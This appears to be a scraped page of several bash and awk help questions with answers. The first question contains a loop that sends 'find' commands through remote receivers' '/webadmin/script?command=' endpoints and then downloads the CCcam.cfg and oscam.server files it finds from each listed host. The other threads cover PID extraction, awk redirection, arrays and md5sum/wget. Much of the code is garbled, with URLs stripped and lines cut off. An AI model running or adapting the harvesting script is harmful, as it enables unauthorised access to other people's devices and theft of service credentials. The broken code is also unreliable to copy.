One liner working, but in bash script not working, why? - bash

curl "|ps%20-T%20-f" | grep oscam | awk 'BEGIN{IGNORECASE=1;oscam;RS="<br>"}; {print $11};' | awk '{print "/file?file="$0"/oscam.server"}' | awk '!x[$0]++'
and bash style
OSCAM="/webadmin/script?command=|ps%20-T%20-f" | grep oscam | awk 'BEGIN{IGNORECASE=1;oscam;RS="<br>"}; {print $11};' | awk '{print "/file?file="$0"/oscam.server"}' | awk '!x[$0]++' > oscam.source.tmp
URL2=$(cat oscam.source.tmp)
for URL in `cat`; do echo $URL; curl -m 5 $1 "$URL$OSCAM" > oscam.source; curl -m 5 $1 "$URL$URL2"
done >
the main problem for me on script didnt running normally, didnt gave an output for oscam.source.tmp

ok refined the script
now finally working :),
for URL in $(<; do echo curl -L -m 5 $1 "'"$URL"/webadmin/script?command=|find%20/etc%20/var%20/usr%20|%20egrep%20%22CCcam.cfg|oscam.server%22'" | bash - | egrep "oscam.server<br>|CCcam.cfg" | awk 'BEGIN{RS="<br>"} {print $1}' > oscam.source.bak && awk '!/^$/' oscam.source.bak | awk '$0="/file?file="$0' > oscam.temp;
for URL2 in $(< oscam.temp); do echo curl -L -m 5 $1 "$URL$URL2" | bash -
done >


How to grep first match and second match(ignore first match) with awk or sed or grep?

> root# ps -ef | grep [j]ava | awk '{print $2,$9}'
> 45134 -Dapex=APEC
> 45135 -Dapex=JAAA
> 45136 -Dapex=APEC
I need to put the first APEC of first as First PID, third line of APEC and Second PID and last one as Third PID.
I've tried awk but no expected result.
> First_PID =ps -ef | grep [j]ava | awk '{print $2,$9}'|awk '{if ($0 == "[^0-9]" || $1 == "APEC:") {print $0; exit;}}'
Expected result should look like this.
> First_PID=45134
> Second_PID=45136
> Third_PID=45135
With your shown samples and attempts please try following awk code. Written and tested in GNU awk.
ps -ef | grep [j]ava |
awk '
val=$2 OFS $9
match(val,/([0-9]+) -Dapex=APEC ([0-9]+) -Dapex=JAAA\s([0-9]+)/,arr)
print "First_PID="arr[1],"Second_PID=",arr[3],"Third_PID=",arr[2]
How about this:
$ input=("1 APEC" "2 JAAA" "3 APEC")
$ printf '%s\n' "${input[#]}" | grep APEC | sed -n '2p'
input=(...) - input data in an array, for testing
printf '%s\n' "${input[#]}" - print input array, one element per line
grep APEC - keep lines containing APEC only
sed -n - run sed without automatic print
sed -n '2p' - print only the second line
If you just want the APECs first...
ps -ef |
awk '/java[ ].* -Dapex=APEC/{print $2" "$9; next; }
/java[ ]/{non[NR]=$2" "$9}
END{ for (rec in non) print non[rec] }'
If possible, use an array instead of those ordinally named vars.
mapfile -t pids < <( ps -ef | awk '/java[ ].* -Dapex=APEC/{print $2; next; }
/java[ ]/{non[NR]=$2} END{ for (rec in non) print non[rec] }' )
After read from everyone idea,I end up with the very simple solution.
FIRST_PID=$(ps -ef | grep APEC | grep -v grep | awk '{print $2}'| sed -n '1p')
SECOND_PID=$(ps -ef | grep APEC | grep -v grep | awk '{print $2}'| sed -n '2p')
JAWS_PID=$(ps -ef | grep JAAA | grep -v grep | awk '{print $2}')

Why does my awk redirection not work?

Im trying to redirect my output to replace the contents of my file but if I do this it doesn't change my output at all
curr_primary_username=`awk '/^Host github\.com$/,/#Username/{print $2}' $ssh_config_path | tail -1`
new_user_name=`awk "/^Host github-$new_primary_username$/,/#Name/{print $2}" $ssh_config_path | tail -1 | sed 's/#Name //' | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//'`
new_user_email=`awk "/^Host github-$new_primary_username$/,/#Email/{print $2}" $ssh_config_path | tail -1 | sed 's/#Email //' | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//'`
echo "Switching from $curr_primary_username to $new_primary_username"
echo "Setting name to $new_user_name"
echo "Setting email to $new_user_email"
awk "
1" $ssh_config_path > temp_ssh_config_path && mv temp_ssh_config_path ssh_config_path
but if I do this I get the correct output on my terminal screen
curr_primary_username=`awk '/^Host github\.com$/,/#Username/{print $2}' $ssh_config_path | tail -1`
new_user_name=`awk "/^Host github-$new_primary_username$/,/#Name/{print $2}" $ssh_config_path | tail -1 | sed 's/#Name //' | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//'`
new_user_email=`awk "/^Host github-$new_primary_username$/,/#Email/{print $2}" $ssh_config_path | tail -1 | sed 's/#Email //' | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//'`
echo "Switching from $curr_primary_username to $new_primary_username"
echo "Setting name to $new_user_name"
echo "Setting email to $new_user_email"
awk "
1" $ssh_config_path
It's disappointing how far you've veered from the answers you were given but in any case here's the correct syntax for your script (untested since you didn't provide any sample input/output):
curr_primary_username=$(awk 'f&&/#Username/{print $2; exit} /^Host github\.com$/{f=1}' "$ssh_config_path")
new_user_name=$(awk -v npu="$new_primary_username" 'f&&/#Name/{print $2; exit} $0~"^Host github-"npu"$"{f=1}' "$ssh_config_path")
new_user_email=$(awk -v npu="$new_primary_username" 'f&&/#Email/{print $2; exit} $0~"^Host github-"npu"$"{f=1}' "$ssh_config_path")
echo "Switching from $curr_primary_username to $new_primary_username"
echo "Setting name to $new_user_name"
echo "Setting email to $new_user_email"
awk -v npu="$new_primary_username" -v cpu="$curr_primary_username" '
1' "$ssh_config_path" > temp_ssh_config_path && mv temp_ssh_config_path "$ssh_config_path"
By doing that I noticed that your last statement was:
mv temp_ssh_config_path ssh_config_path
when you probably meant:
mv temp_ssh_config_path "$ssh_config_path"
and that would have caused a problem with your expected output file being empty.
The whole thing should, of course, have been written as just 1 simple awk script.

How to reference multiple string values in array in Shell script

I am trying to store multiple string in for loop but it giving me unwanted answer.
My code is :
declare -a arr=("ps -ef | grep icsmpgum | grep $USER | grep -v grep | awk '{print $9,$8}' | awk '{print $1}'")
for i in "${arr[#]}"
echo "$i"
The output of
ps -ef | grep icsmpgum | grep $USER | grep -v grep | awk '{print $9,$8}' | awk '{print $1}'
is :
I want to refer to these 3 string values in for loop but after applying for loop as mention above it giving me output as :
Output :
ps -ef | grep icsmpgum | grep tsaprm1 | grep -v grep | awk '{print ,}' | awk '{print }'
How should I store these string values in variables ?
You need to use a command substitution, rather than quoting the command:
arr=( $(ps -ef | grep icsmpgum | grep $USER | grep -v grep | awk '{print $9,$8}' | awk '{print $1}') )
I suspect that this will work but there's a lot of further tidying up to be done; all the filtering that you want to do is possible in one call to awk:
arr=( $(ps -ef | awk -v user="$USER" '!/awk/ && /icsmpgum/ && $0 ~ user { print $9 }') )
As mentioned in the comments, there are potential risks to building an array like this (e.g. glob characters such as * would be expanded and you would end up with extra values in the array). A safer option would be to use a process substitution:
read -ra arr < <(ps -ef | awk -v user="$USER" '!/awk/ && /icsmpgum/ && $0 ~ user { print $9 }')

AWK variable input

I've got the following bash code:
md5sum -c checksum.md5 2>&1 | grep FAILED | awk '{print $1}' | sed 's/:$// > /tmp/check.tmp
awk '{system("wget"$1"")}' /tmp/check.tmp
How can I use awk without a temp file?
Something like
files=`md5sum -c checksum.md5 2>&1 | grep FAILED | awk '{print $1}' | sed 's/:$//`
awk '{system("wget"$1"")}' $files
You can simplify the whole command to this:
md5sum -c checksum.md5 2>&1 |\
awk -F'[:/]' '/FAILED/{system("wget"$(NF-1))}'
wget has a switch -i that can come in handy:
md5sum -c checksum.md5 2>&1 | \
sed -n '/FAILED$/ { s/: FAILED$//; s!^!!; p; }' | \
wget -i
Like this:
awk '{system("wget"$1"")}' <<< $files

No output when using awk inside bash script

My bash script is:
output=$(curl -s | sed -nr 's/.*<title>(.*?)<\/title>.*/\1/p')
score=echo"$output" | awk '{print $1}'
echo $score
The above script prints just a newline in my console whereas my required output is
$ curl -s | sed -nr 's/.*<title>(.*
?)<\/title>.*/\1/p' | awk '{print $1}'
So, why am I not getting the output from my bash script whereas it works fine in terminal am I using echo"$output" in the wrong way.
output=$(curl -s | sed -nr 's/.*<title>(.*?)<\/title>.*/\1/p')
score=$( echo "$output" | awk '{ print $1 }' )
echo "$score"
Score variable was probably empty, since your syntax was wrong.
